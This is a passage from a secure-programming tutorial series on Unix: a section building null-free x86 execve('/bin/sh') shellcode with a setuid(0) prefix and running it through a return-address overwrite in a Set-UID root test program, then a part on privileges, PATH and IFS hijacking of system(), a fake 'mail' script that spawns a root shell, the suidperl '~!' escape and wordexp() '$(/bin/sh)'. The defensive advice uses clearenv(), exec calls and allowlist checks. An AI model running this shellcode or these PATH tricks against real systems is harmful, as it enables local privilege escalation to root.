0x804d996 <_exit+6>:    mov    $0x1,%eax
0x804d99b <_exit+11>:   int    $0x80
0x804d99d <_exit+13>:   mov    %edx,%ebx
0x804d99f <_exit+15>:   cmp    $0xfffff001,%eax
0x804d9a4 <_exit+20>:   jae    0x804dd90 <__syscall_error>
End of assembler dump.
(gdb) quit

The real kernel call is done through the 0x80 interrupt, at address 0x804d9d0 for execve() and at 0x804d99b for _exit(). This entry point is common to various system-calls, so the distinction is made with the %eax register content. For execve(), it holds the 0x0B value, while for _exit() it holds 0x01.

Diag. 4 : parameters of the execve() function

The analysis of these functions’ Assembly instructions provides us with the parameters they use :

  • execve() needs various parameters (cf. diag 4) :
    • the %ebx register holds the string address representing the command to execute, “/bin/sh” in our example (0x804d9b1 : mov 0x8(%ebp),%edi followed by 0x804d9c9 : mov %edi,%ebx) ;
    • the %ecx register holds the address of the argument array (0x804d9c2 : mov 0xc(%ebp),%ecx). The first argument must be the program name and we need nothing else : an array holding the string address “/bin/sh” and a NULL pointer will be enough;
    • the %edx register holds the address of the array representing the environment of the program to launch (0x804d9c5 : mov 0x10(%ebp),%edx). To keep our program simple, we’ll use an empty environment : a NULL pointer will do the trick.
  • the _exit() function ends the process and returns an exit code to its parent (usually a shell), held in the %ebx register.

We then need the “/bin/sh” string, a pointer to this string and a NULL pointer (for the arguments since we have none and for the environment since we don’t define any). We can see a possible data representation before the execve() call. Building an array with a pointer to the /bin/sh string followed by a NULL pointer, %ebx will point to the string, %ecx to the whole array, and %edx to the second item of the array (NULL). This is shown in diag. 5.

Diag. 5 : data representation relative to registers

Locating the shellcode within memory

The shellcode is usually inserted into a vulnerable program through a command line argument, an environment variable or a typed string. Anyway, when creating the shellcode, we don’t know the address it will use. Nevertheless, we must know the “/bin/sh” string address. A small trick allows us to get it.

When calling a subroutine with the call instruction, the CPU stores the return address in the stack, that is the address immediately following this call instruction (see above). Usually, the next step is to store the stack state (especially the %ebp register with the push %ebp instruction). To get the return address when entering the subroutine, it’s enough to unstack with the pop instruction. Of course, we then store our “/bin/sh” string immediately after the call instruction to allow our “home made prolog” to provide us with the required string address. That is :

    jmp subroutine_call

subroutine:
    popl %esi
    (Shellcode itself)
subroutine_call:
    call subroutine
    (the "/bin/sh" string)

Of course, the subroutine is not a real one: either the execve() call succeeds, and the process is replaced with a shell, or it fails and the _exit() function ends the program. The %esi register gives us the “/bin/sh” string address. Then, it’s enough to build the array just after the string : its first item (at %esi+8, the /bin/sh length plus a null byte) holds the value of the %esi register, and its second, at %esi+12, a null address (32 bit). The code will look like :

    popl %esi
    movl %esi, 0x8(%esi)
    movl $0x00, 0xc(%esi)

Diagram 6 shows the data area :

Diag. 6 : data array

The null bytes problem

Vulnerable functions are often string manipulation routines such as strcpy(). To insert the code into the middle of the target application, the shellcode has to be copied as a string. However, these copy routines stop as soon as they find a null character. Then, our code must not have any. Using a few tricks will prevent us from writing null bytes. For example, the instruction

    movl $0x00, 0x0c(%esi)

will be replaced with

    xorl %eax, %eax
    movl %eax, 0x0c(%esi)

This example removes an explicit null byte. However, the translation of some instructions to hexadecimal can reveal others. For example, to make the distinction between the _exit(0) system-call and others, the %eax register value is 1, as seen in
0x804d996 <_exit+6>: mov $0x1,%eax
Converted to hexadecimal, this instruction becomes :

 b8 01 00 00 00          mov    $0x1,%eax

You must then avoid its use. The trick is to initialize %eax from a register holding 0 and then increment it.

On the other hand, the “/bin/sh” string must end with a null byte. We can write one while creating the shellcode, but, depending on the mechanism used to insert it into a program, this null byte may not be present in the final application. It’s better to add one this way :

    /* movb only works on one byte */
    /* this instruction is equivalent to */
    /* movb %al, 0x07(%esi) */
    movb %eax, 0x07(%esi)

Building the shellcode

We now have everything to create our shellcode :

/* shellcode4.c */

int main()
{
  asm("jmp subroutine_call\n"

      "subroutine:\n"
      /* Getting /bin/sh address */
      "    popl %esi\n"
      /* Writing it as first item in the array */
      "    movl %esi,0x8(%esi)\n"
      /* Writing NULL as second item in the array */
      "    xorl %eax,%eax\n"
      "    movl %eax,0xc(%esi)\n"
      /* Putting the null byte at the end of the string */
      "    movb %al,0x7(%esi)\n"
      /* execve() function */
      "    movb $0xb,%al\n"
      /* String to execute in %ebx */
      "    movl %esi,%ebx\n"
      /* Array arguments in %ecx */
      "    leal 0x8(%esi),%ecx\n"
      /* Array environment in %edx */
      "    leal 0xc(%esi),%edx\n"
      /* System-call */
      "    int  $0x80\n"

      /* Null return code */
      "    xorl %ebx,%ebx\n"
      /* _exit() function : %eax = 1 */
      "    movl %ebx,%eax\n"
      "    inc  %eax\n"
      /* System-call */
      "    int  $0x80\n"

      "subroutine_call:\n"
      "    call subroutine\n"
      "    .string \"/bin/sh\"\n");
}

The code is compiled with “gcc -o shellcode4 shellcode4.c”. The command “objdump --disassemble shellcode4” ensures that our binary no longer holds any null bytes :

08048398 <main>:
 8048398:   55                      pushl  %ebp
 8048399:   89 e5                   movl   %esp,%ebp
 804839b:   eb 1f                   jmp    80483bc <subroutine_call>

0804839d <subroutine>:
 804839d:   5e                      popl   %esi
 804839e:   89 76 08                movl   %esi,0x8(%esi)
 80483a1:   31 c0                   xorl   %eax,%eax
 80483a3:   89 46 0c                movl   %eax,0xc(%esi)
 80483a6:   88 46 07                movb   %al,0x7(%esi)
 80483a9:   b0 0b                   movb   $0xb,%al
 80483ab:   89 f3                   movl   %esi,%ebx
 80483ad:   8d 4e 08                leal   0x8(%esi),%ecx
 80483b0:   8d 56 0c                leal   0xc(%esi),%edx
 80483b3:   cd 80                   int    $0x80
 80483b5:   31 db                   xorl   %ebx,%ebx
 80483b7:   89 d8                   movl   %ebx,%eax
 80483b9:   40                      incl   %eax
 80483ba:   cd 80                   int    $0x80

080483bc <subroutine_call>:
 80483bc:   e8 dc ff ff ff          call   804839d <subroutine>
 80483c1:   2f                      das
 80483c2:   62 69 6e                boundl 0x6e(%ecx),%ebp
 80483c5:   2f                      das
 80483c6:   73 68                   jae    8048430 <_IO_stdin_used+0x14>
 80483c8:   00 c9                   addb   %cl,%cl
 80483ca:   c3                      ret
 80483cb:   90                      nop
 80483cc:   90                      nop
 80483cd:   90                      nop
 80483ce:   90                      nop
 80483cf:   90                      nop

The data found after the 80483c1 address doesn’t represent instructions, but the “/bin/sh” string characters (in hexadecimal, the sequence 2f 62 69 6e 2f 73 68 00) and random bytes. The code doesn’t hold any zeros, except the null character at the end of the string at 80483c8.

Now, let’s test our program :

$ ./shellcode4
Segmentation fault (core dumped)

Ooops! Not very conclusive. If we think a bit, we can see the memory area where the main() function is found (i.e. the text area mentioned at the beginning of this article) is read-only. The shellcode can not modify it. What can we do now, to test our shellcode?

To get round the read-only problem, the shellcode must be put in a data area. Let’s put it in an array declared as a global variable. We must use another trick to be able to execute the shellcode. Let’s replace the main() function return address found in the stack with the address of the array holding the shellcode. Don’t forget that the main function is a “standard” routine, called by pieces of code that the linker added. The return address is overwritten by writing the address of the array of characters two places below the stack’s first position.

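  /* shellcode5.c */

  /* Bytes taken from the objdump listing of shellcode4 above */
  char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  int main()
  {
      int * ret;

      /* +2 will behave as a 2 words offset */
      /* (i.e. 8 bytes) to the top of the stack : */
      /*   - the first one for the reserved word for the
             local variable */
      /*   - the second one for the saved %ebp register */

      * ((int *) & ret + 2) = (int) shellcode;
      return (0);
  }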

Now, we can test our shellcode :

$ cc shellcode5.c -o shellcode5
$ ./shellcode5
bash$ exit

We can even install the shellcode5 program Set-UID root, and check that the shell launched from the data handled by this program runs under the root identity :

$ su
# chown root.root shellcode5
# chmod +s shellcode5
# exit
$ ./shellcode5
bash# whoami
bash# exit

Generalization and last details

This shellcode is somewhat limited (well, it’s not too bad with so few bytes!). For instance, if our test program becomes :

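  /* shellcode5bis.c */

  #include <unistd.h>

  char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  int main()
  {
      int * ret;
      seteuid(getuid());
      * ((int *) & ret + 2) = (int) shellcode;
      return (0);
  }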

we fix the process effective UID to its real UID value, as we suggested in the previous article. This time, the shell is run without specific privileges :

$ su
# chown root.root shellcode5bis
# chmod +s shellcode5bis
# exit
$ ./shellcode5bis
bash# whoami
bash# exit

However, the seteuid(getuid()) instructions are not a very effective protection. One need only insert the setuid(0); call equivalent at the beginning of a shellcode to get the rights linked to the initial EUID for an S-UID application.

This instruction code is :

  char setuid[] =
         "\x31\xc0"       /* xorl %eax, %eax */
         "\x31\xdb"       /* xorl %ebx, %ebx */
         "\xb0\x17"       /* movb $0x17, %al */
         "\xcd\x80";      /* int  $0x80      */

Integrating it into our previous shellcode, our example becomes :

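  /* shellcode6.c */

  char shellcode[] =
  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0) */
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  int main()
  {
      int * ret;
      * ((int *) & ret + 2) = (int) shellcode;
      return (0);
  }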

Let’s check how it works :

$ su
# chown root.root shellcode6
# chmod +s shellcode6
# exit
$ ./shellcode6
bash# whoami
bash# exit

As shown in this last example, it’s possible to add functions to a shellcode, for instance, to leave the directory imposed by the chroot() function or to open a remote shell using a socket.

Such changes seem to imply you can adapt the value of some bytes in the shellcode according to their use :

eb XX            jmp <subroutine_call>   XX = number of bytes to reach <subroutine_call>
5e               popl %esi
89 76 XX         movl %esi,XX(%esi)      XX = position of the first item in the argument array (i.e. the command address). This offset is equal to the number of characters in the command, '\0' included.
31 c0            xorl %eax,%eax
89 46 XX         movl %eax,XX(%esi)      XX = position of the second item in the array, here having a NULL value.
88 46 XX         movb %al,XX(%esi)       XX = position of the end-of-string '\0'.
b0 0b            movb $0xb,%al
89 f3            movl %esi,%ebx
8d 4e XX         leal XX(%esi),%ecx      XX = offset to reach the first item in the argument array and to put it in the %ecx register
8d 56 XX         leal XX(%esi),%edx      XX = offset to reach the second item in the argument array and to put it in the %edx register
cd 80            int $0x80
31 db            xorl %ebx,%ebx
89 d8            movl %ebx,%eax
40               incl %eax
cd 80            int $0x80
e8 XX XX XX XX   call <subroutine>       these 4 bytes correspond to the number of bytes to reach <subroutine> (negative number, written in little endian)


We wrote an approximately 40 byte long program and are able to run any external command as root. Our last examples show some ideas about how to smash a stack. More details on this mechanism in the next article…

Avoiding security holes when developing an application – Part 1


This article is the first one in a series about the main types of security holes in applications. We’ll show the ways to avoid them by changing your development habits a little.


It doesn’t take more than two weeks before a major application which is part of most Linux distributions presents a security hole allowing, for instance, a local user to become root. Despite the great quality of most of this software, ensuring the security of a program is a hard job : it must not allow a bad guy to benefit illegally from system resources. The availability of application source code is a good thing, much appreciated by programmers, but the smallest defects in software become visible to everyone. Furthermore, the detection of such defects comes at random and the people finding them do not always have good intentions.

From the sysadmin side, daily work consists of reading the lists concerning security problems and immediately updating the involved packages. For a programmer it can be a good lesson to try out such security problems, since avoiding security holes from the beginning is preferable to fixing them afterwards. We’ll try to define some “classic” dangerous behaviors and provide solutions to reduce the risks. We won’t talk about network security problems since they often stem from configuration mistakes (dangerous cgi-bin scripts, …) or from system bugs allowing DOS (Denial Of Service) type attacks to prevent a machine from listening to its own clients. These problems concern the sysadmin or the kernel developers. But the application programmer must also protect her code as soon as she takes into account external data. Some versions of pine, acroread, netscape, access, … have allowed elevated access or information leaks under some conditions. As a matter of fact secure programming is everyone’s concern.

This set of articles shows methods which can be used to damage a Unix system. We could only have mentioned them or said a few words about them, but we prefer complete explanations to make people understand the risks. Thus, when debugging a program or developing your own, you’ll be able to avoid or correct these mistakes. For each discussed hole, we will take the same approach. We’ll start by detailing the way it works. Next, we will show how to avoid it. For every example we will use security holes still present in widespread software.

This first article talks about the basics needed for understanding security holes, that is the notion of privileges and the Set-UID or Set-GID bit. Next, we analyse the holes based on the system() function, since they are easier to understand.

We will often use small C programs to illustrate what we are talking about. However, the approaches mentioned in these articles are applicable to other programming languages : perl, java, shell scripts… Some security holes depend on a language, but this is not true for all of them, as we will see with system().


On a Unix system, users are not equal, and neither are applications. The access to the file system nodes – and accordingly the machine peripherals – relies on a strict identity control. Some users are allowed to do sensitive operations to maintain the system in good condition. A number called UID (User Identifier) allows the identification. To make things easier, a user name corresponds to this number; the association is done in the /etc/passwd file.

The UID of 0, with default name of root, can access everything in the system. He can create, modify, remove every system node, and can also manage the physical configuration of the machine, mounting partitions, activating network interfaces and changing their configuration (IP address), or using system calls such as mlock() to act on physical memory, or sched_setscheduler() to change the scheduling policy. In a future article we will study the Posix.1e features which allow limiting the privileges of an application executed as root, but for now, let’s assume the super-user can do everything on a machine.

The attacks we will mention are internal ones, that is an authorized user on a machine tries to gain privileges he doesn’t have. On the other hand, the network attacks are external ones, coming from people trying to connect to a machine they are not allowed on.

To use privileges reserved for another user without being able to log in under her identity, one must at least have the opportunity to talk to an application running under the victim’s UID. When an application – a process – runs under Linux, it has a well defined identity. First, a program has an attribute called RUID (Real UID) corresponding to the ID of the user who launched it. This data is managed by the kernel and usually can not change. A second attribute completes this information : the EUID field (Effective UID) corresponding to the identity the kernel takes into account when managing the access rights (opening files, reserved system-calls).

To get the privileges of another user means everything will be done under the UID of that user, and not under one’s own UID. Of course, a cracker tries to get the root ID, but many other user accounts are of interest, either because they give access to system information (news, mail, lp…) or because they allow reading private data (mail, personal files, etc) or they can be used to hide illegal activities such as attacks on other sites.

To run an application with the privileges of an Effective UID different from its Real UID (the user who launched it) the executable file must have a specific bit turned on called Set-UID. This bit is found in the file permission attribute (like user’s execute, read, write bits, group members or others) and has the octal value of 4000. The Set-UID bit is represented with an s when displaying the rights with the ls command :

>> ls -l /bin/su
-rwsr-xr-x  1 root  root  14124 Aug 18  1999 /bin/su

The command “find / -type f -perm +4000” displays a list of the system applications having their Set-UID bit set to 1 (recent versions of GNU find no longer accept the +4000 form; -perm -4000 is the equivalent there). When the kernel runs an application with the Set-UID bit on, it uses the program owner’s identity as EUID for the process. On the other hand, the RUID doesn’t change and corresponds to the user who launched the program. For instance, every user can have access to the /bin/su command, but it runs under its owner’s identity (root) with every privilege on the system. Needless to say one must be very careful when writing a program with this attribute.

Each process also has an Effective group ID, EGID, and a real identifier RGID. The Set-GID bit (2000 in octal) in the access rights of an executable file asks the kernel to use the group owning the file as EGID and not the GID of the user who launched the program. A curious combination sometimes appears with the Set-GID set to 1 but without the group execute bit. As a matter of fact, it’s a convention having nothing to do with privileges related to applications, but indicating the file can be locked with the function fcntl(fd, F_SETLK, lock). Usually an application doesn’t use the Set-GID bit, but it does happen sometimes. Some games, for instance, use it to save the best scores into a system directory.

Type of attacks and potential targets

There are various types of attacks against a system. Today we’ll study the mechanisms to execute an external command from within an application. This is usually a shell running under the identity of the owner of the application. A second type of attack relies on buffer overflow, giving the attacker the ability to run personal code instructions. Last, the third main type of attack is based on race condition – a lapse of time between two instructions in which a system component is changed (usually a file) while the application believes it remains the same.

The first two types of attacks often try to execute a shell with the application owner’s privileges, while the third one is targeted instead at getting write access to protected system files. Read access is sometimes considered a system security weakness (personal files, emails, password file /etc/shadow, and pseudo kernel configuration files in /proc).

The targets of security attacks are mostly the programs having a Set-UID (or Set-GID) bit on. However, this also affects every application running under a different ID than the one of its user. The system daemons represent a big part of these programs. A daemon is an application usually started at boot time, running in the background without any control terminal, and doing privileged work for any user. For instance, the lpd daemon allows every user to send documents to the printer, sendmail receives and redirects electronic mail, and apmd asks the Bios for the battery status of a laptop. Some daemons are in charge of communication with external users through the network (Ftp, Http, Telnet… services). A server called inetd manages the connections of many of these services.

We can then conclude that a program can be attacked as soon as it talks – even briefly – to a user different from the one who started it. While developing this type of application you must be careful to keep in mind the risks presented by the functions we will study here.

Changing privilege levels

When an application runs with an EUID different from its RUID, it’s to provide the user with privileges he needs but doesn’t have (file access, reserved system calls…). However these privileges are only needed for a very short time, for instance when opening a file, otherwise the application is able to run with its user’s privileges. It’s possible to temporarily change an application EUID with the system-call :

  int seteuid (uid_t uid);

A process can always change its EUID value to that of its RUID. In that case, the old UID is kept in a saved field called SUID (Saved UID), not to be confused with the SID (Session ID) used for control terminal management. It’s always possible to get the SUID back to use it as EUID. Of course, a program having a null EUID (root) can change at will both its EUID and RUID (it’s the way /bin/su works).

To reduce the risks of attacks, it’s suggested to change the EUID and use the RUID of the users instead. When a portion of code needs privileges corresponding to those of the file’s owner, it’s possible to put the Saved UID into the EUID. Here is an example :

  #include <sys/types.h>
  #include <unistd.h>

  uid_t e_uid_initial;
  uid_t r_uid;

  void privileged_function (void);

  int
  main (int argc, char * argv [])
  {
    /* Saves the different UIDs */
    e_uid_initial = geteuid ();
    r_uid = getuid ();

    /* limits access rights to the ones of the
     * user launching the program */
    seteuid (r_uid);
    privileged_function ();
    return (0);
  }

  void
  privileged_function (void)
  {
    /* Gets initial privileges back */
    seteuid (e_uid_initial);
    /* Portion needing privileges */
    /* Back to the rights of the runner */
    seteuid (r_uid);
  }

This method is much more secure than the unfortunately all too common one consisting of using the initial EUID and then temporarily reducing the privileges just before doing a “risky” operation. However this privilege reduction is useless against buffer-overflow attacks. As we’ll see in a later article, these attacks intend to ask the application to execute personal instructions and can contain the system-calls needed to make the privilege level higher. Nevertheless, this approach protects from external commands and from most race conditions.

Running external commands

An application often needs to call an external system service. A well-known example is the mail command, used to send electronic mail (execution report, alarm, statistics, etc.) without requiring a complex dialog with the mail system. The easiest solution is to use the library function:

  int system (const char * command);

Dangers of the system() function

This function is rather dangerous: it calls the shell to execute the command given as an argument, and the shell’s behavior depends on the user’s choices. A typical example comes from the PATH environment variable. Let’s look at an application calling the mail command. For instance, the following program sends its source code to the user who launched it:

/* system1.c */

#include <stdio.h>
#include <stdlib.h>

int main (void)
{
  if (system ("mail $USER < system1.c") != 0)
    perror ("system");
  return (0);
}

Let’s say this program is Set-UID root :

>> cc system1.c -o system1
>> su
[root] chown root.root system1
[root] chmod +s system1
[root] exit
>> ls -l system1
-rwsrwsr-x  1 root  root  11831  Oct 16  17:25 system1

To execute the command, system() runs a shell (/bin/sh) and uses the -c option to pass it the instruction to invoke. The shell then goes through the directories listed in the PATH environment variable to find an executable called mail. To compromise the program, the user only has to change this variable’s content before running the application. For example :

  >> export PATH=.
  >> ./system1

makes the shell look for the mail command only within the current directory. One need merely create an executable file (for instance, a script running a new shell), name it mail, and it will be executed with the EUID of the main application’s owner! Here, our script runs /bin/sh. However, since it’s executed with a redirected standard input (like the initial mail command), we must reattach it to the terminal. We then create the script:

#! /bin/sh
# "mail" script running a shell
# getting its standard input back.
/bin/sh < /dev/tty

Here is the result :

>> export PATH="."
>> ./system1
bash# /usr/bin/whoami
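To see why PATH matters so much, the lookup a shell performs for a bare command name can be sketched as follows. This is an illustration only, not the code of any real shell, and resolve_in_path() is a hypothetical name. A real shell also checks that the match is a regular file.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Illustrative only: tries each PATH entry in order and writes the
 * first executable match into out. An empty entry means the current
 * directory, as in the shell. Returns 0 on a match, -1 otherwise. */
int resolve_in_path (const char * path, const char * name,
                     char * out, size_t out_size)
{
  const char * start = path;

  while (start != NULL) {
    const char * end = strchr (start, ':');
    size_t len = (end != NULL) ? (size_t) (end - start) : strlen (start);
    int written;

    if (len == 0)
      written = snprintf (out, out_size, "./%s", name);
    else
      written = snprintf (out, out_size, "%.*s/%s", (int) len, start, name);

    if (written > 0 && (size_t) written < out_size
        && access (out, X_OK) == 0)
      return 0;
    start = (end != NULL) ? end + 1 : NULL;
  }
  return -1;
}
```

With path set to "." the only candidate is ./mail, so whoever controls the current directory controls which program runs.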

Of course, the first solution consists in giving the full path of the program, for instance /bin/mail. Then a new problem appears: the application relies on the system installation. While /bin/mail is usually available on every system, where is GhostScript, for instance (/usr/bin, /usr/share/bin, /usr/local/bin)? Moreover, another type of attack becomes possible with some old shells: the use of the IFS environment variable. The shell uses it to split the command line into words; it holds the separators, which by default are the space, the tab and the newline. If the user adds the slash /, the command “/bin/mail” is understood by the shell as “bin mail”. An executable file called bin in the current directory can then be run just by setting PATH, as we have seen before, and it runs with the application’s EUID.

Under Linux, the IFS environment variable is no longer a problem, since bash and pdksh both complete it with the default characters on startup. But, keeping application portability in mind, you must be aware that some systems might be less secure regarding this variable.

Some other environment variables may cause unexpected problems. For instance, the mail application lets the user run a command while composing a message, using the escape sequence “~!”. If the user writes the string “~!command” at the beginning of a line, the command is run. The program /usr/bin/suidperl, used to make Perl scripts work with a Set-UID bit, calls /bin/mail to send a message to root when it detects a problem. Since suidperl is Set-UID root, the call to /bin/mail is made with root’s privileges, and the message contains the name of the faulty file. A user can then create a file whose name contains a carriage return followed by a ~!command sequence and another carriage return. If a Perl script calling suidperl fails on a low-level problem related to this file, a message is sent under the root identity, containing the escape sequence for the mail application, and the command in the file name is executed with root’s privileges.

This problem shouldn’t exist, since the mail program is not supposed to accept escape sequences when run automatically (not from a terminal). Unfortunately, an undocumented feature of this application (probably left over from debugging) enables the escape sequences as soon as the environment variable interactive is set. The result? An easily exploitable (and widely exploited) security hole in an application supposed to improve system security. The blame is shared. First, /bin/mail has an undocumented and especially dangerous option, since it allows code execution based solely on the data sent, which should be a priori suspicious for a mail utility. Second, even if the /usr/bin/suidperl developers were not aware of the interactive variable, they shouldn’t have left the execution environment as it was when calling an external command, especially when writing a Set-UID root program.
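Independently of the environment, data handed to an external command can be screened first. As a minimal sketch, and assuming a policy in which file names containing control characters are simply refused, a check like the following would have rejected the file name used in this attack. The function name is hypothetical.

```c
#include <ctype.h>

/* Hypothetical check: returns 1 if the string contains any control
 * character (newline, carriage return, escape, ...), 0 otherwise. */
int contains_control_chars (const char * s)
{
  for (; *s != '\0'; s ++) {
    if (iscntrl ((unsigned char) *s))
      return 1;
  }
  return 0;
}
```

Such a check complements cleaning the environment; it does not replace it.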

As a matter of fact, Linux ignores the Set-UID and Set-GID bits when executing scripts (read /usr/src/linux/fs/binfmt_script.c and /usr/src/linux/fs/exec.c). But some tricks allow you to bypass this rule, as Perl does for its own scripts, using /usr/bin/suidperl to take these bits into account.


It isn’t always easy to find a replacement for the system() function. The first option is to use functions of the exec family, such as execl() or execle(). However, the behavior is quite different: the external program is no longer called as a subroutine; instead, the invoked command replaces the current process. You must therefore fork the process yourself and split the command line into arguments. Thus the program:

  if (system ("/bin/lpr -Plisting stats.txt") != 0) {
    perror ("Printing");
    return (-1);
  }

becomes :

/* needs <stdio.h>, <stdlib.h>, <unistd.h>, <sys/types.h>, <sys/wait.h> */
pid_t pid;
int   status;

if ((pid = fork()) < 0) {
  perror ("fork");
  return (-1);
}
if (pid == 0) {
  /* child process */
  execl ("/bin/lpr", "lpr", "-Plisting", "stats.txt", NULL);
  /* only reached if execl() failed */
  perror ("execl");
  exit (-1);
}
/* father process */
waitpid (pid, & status, 0);
if ((! WIFEXITED (status)) || (WEXITSTATUS (status) != 0)) {
  perror ("Printing");
  return (-1);
}

Obviously, the code gets heavier! In some situations, it becomes quite complex, for instance, when you must redirect the application standard input such as in :

system ("mail root < stat.txt");

Here, the redirection defined by < is performed by the shell. You can do the same yourself, using a more complicated sequence such as fork(), open(), dup2(), execl(), etc. In that case, an acceptable solution is to keep using the system() function, but only after configuring the whole environment.
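For reference, the fork(), open(), dup2() and exec sequence could look like the sketch below. The function name run_with_stdin() and its parameters are illustrative assumptions. The child still inherits the caller’s environment, so this does not replace the clean-up described next.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Sketch: runs the program at `path` with its standard input
 * redirected from `input_file`, without involving any shell.
 * Returns the child's exit status, or -1 on failure. */
int run_with_stdin (const char * path, char * const argv [],
                    const char * input_file)
{
  pid_t pid;
  int   status;

  if ((pid = fork ()) < 0)
    return -1;
  if (pid == 0) {
    /* child process: replace descriptor 0 with the input file */
    int fd = open (input_file, O_RDONLY);
    if (fd < 0 || dup2 (fd, STDIN_FILENO) < 0)
      _exit (127);
    if (fd != STDIN_FILENO)
      close (fd);
    execv (path, argv);   /* absolute path: PATH is never consulted */
    _exit (127);          /* only reached if execv() failed */
  }
  /* father process */
  if (waitpid (pid, & status, 0) < 0 || ! WIFEXITED (status))
    return -1;
  return WEXITSTATUS (status);
}
```

The equivalent of system ("mail root < stat.txt") would pass "/bin/mail" as path, an argv of { "mail", "root", NULL } and "stat.txt" as input_file.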

Under Linux, the environment variables are stored as an array of pointers to character strings: char ** environ. This array ends with NULL. The strings are of the form “NAME=value”.

We start by clearing the environment, using the GNU extension:

    int clearenv (void);

or forcing the pointer

    extern char ** environ;

to take the NULL value. Next the important environment variables are initialized, using controlled values, with the functions :

    int setenv (const char * name, const char * value, int overwrite);
    int putenv (char * string);

before calling the system() function. For example :

    clearenv ();
    setenv ("PATH", "/bin:/usr/bin:/usr/local/bin", 1);
    setenv ("IFS", " \t\n", 1);
    system ("mail root < /tmp/msg.txt");

If needed, you can save the content of some useful variables (HOME, LANG, TERM, TZ, etc.) before clearing the environment. The content, form and size of these variables must be strictly checked. It is important to clear the whole environment before redefining the needed variables. The suidperl security hole wouldn’t have appeared if the environment had been properly cleared.
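A minimal sketch of this save, check, clear and rebuild sequence follows. The validation policy (at most 64 characters from a small allowed set) and the choice of LANG as the only variable carried over are assumptions made for the example, as are the function names.

```c
#define _GNU_SOURCE   /* for clearenv(), a GNU extension */
#include <stdlib.h>
#include <string.h>

/* Hypothetical policy: a saved value is kept only if it is short and
 * made of letters, digits and a few punctuation characters. */
static int is_safe_value (const char * v)
{
  size_t len = strlen (v);

  if (len == 0 || len > 64)
    return 0;
  return strspn (v, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
                    "0123456789_.@-") == len;
}

/* Clears the environment, then rebuilds it from controlled values.
 * Only LANG is carried over, and only if it passes the check. */
int sanitize_environment (void)
{
  char saved_lang [65] = "";
  const char * lang = getenv ("LANG");

  if (lang != NULL && is_safe_value (lang))
    strcpy (saved_lang, lang);   /* copy first: clearenv() invalidates it */

  if (clearenv () != 0)
    return -1;
  if (setenv ("PATH", "/bin:/usr/bin", 1) != 0
      || setenv ("IFS", " \t\n", 1) != 0)
    return -1;
  if (saved_lang [0] != '\0' && setenv ("LANG", saved_lang, 1) != 0)
    return -1;
  return 0;
}
```

Calling sanitize_environment() just before system() leaves the shell with only PATH, IFS and, possibly, a checked LANG.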

By analogy, protecting a machine on a network first implies denying every connection; next, the sysadmin activates the required or useful services. In the same way, when programming a Set-UID application, the environment must be cleared and then filled with the required variables.

Verifying a parameter’s format is done by comparing its value to the allowed formats. If the comparison succeeds, the parameter is validated; otherwise, it is rejected. If you instead test against a list of invalid formats, the risk of letting a malformed value through increases, and that can be a disaster for the system.
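As a small illustration of checking against an allowed format, here is a sketch that validates a user name. The format itself (1 to 32 characters, a lowercase letter followed by lowercase letters, digits, '_' or '-') is an assumption chosen for the example, not a rule from this article.

```c
#include <string.h>

/* Hypothetical allowed format: 1 to 32 characters, first a lowercase
 * letter, then lowercase letters, digits, '_' or '-'.
 * Returns 1 if s matches, 0 otherwise. */
int is_valid_username (const char * s)
{
  size_t i, len = strlen (s);

  if (len < 1 || len > 32)
    return 0;
  if (s [0] < 'a' || s [0] > 'z')
    return 0;
  for (i = 1; i < len; i ++) {
    char c = s [i];
    if (! ((c >= 'a' && c <= 'z') || (c >= '0' && c <= '9')
           || c == '_' || c == '-'))
      return 0;
  }
  return 1;
}
```

Anything not explicitly allowed is rejected, so shell metacharacters never need to be enumerated.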

We must understand that what is dangerous with system() is also dangerous for derived functions such as popen(), and for functions such as execlp() or execvp(), which take the PATH variable into account.

Indirect execution of commands

To improve a program’s usability, it’s tempting to let the user configure most of the software’s behavior, using macros for instance. To manage variables or generic patterns as the shell does, there is a powerful function called wordexp(). You must be very careful with it, since passing a string like $(command) causes the mentioned external command to be executed. Giving it the string “$(/bin/sh)” starts a shell with the program’s Set-UID privileges. To avoid this, wordexp() accepts a flag called WRDE_NOCMD that disables the interpretation of the $( ) sequence.
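A minimal sketch of calling wordexp() with WRDE_NOCMD is shown below. The wrapper name expand_without_commands() is hypothetical. With this flag, a string requesting command substitution makes wordexp() fail with WRDE_CMDSUB instead of running the command.

```c
#include <stdio.h>
#include <wordexp.h>

/* Sketch: expands `input` as the shell would, but with command
 * substitution disabled, and copies the first resulting word into out.
 * Returns 0 on success, -1 if the expansion produced no word, or the
 * non-zero wordexp() error code (WRDE_CMDSUB when a command
 * substitution was requested). */
int expand_without_commands (const char * input, char * out, size_t out_size)
{
  wordexp_t words;
  int rc = wordexp (input, & words, WRDE_NOCMD);

  if (rc != 0)
    return rc;
  if (words.we_wordc < 1) {
    wordfree (& words);
    return -1;
  }
  snprintf (out, out_size, "%s", words.we_wordv [0]);
  wordfree (& words);
  return 0;
}
```

Variable expansion still works, so the result remains only as trustworthy as the environment it draws from.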

When invoking external commands, you must be careful not to call a utility providing an escape mechanism to a shell (like the vi :!command sequence). It’s difficult to list them all: some applications are obvious (text editors, file managers…), others are harder to detect (as we have seen with /bin/mail) or have dangerous debugging modes.


This article illustrates several points:

  • Everything external to a Set-UID root program must be validated! This means the environment variables as well as the parameters given to the program (command line, configuration file…);
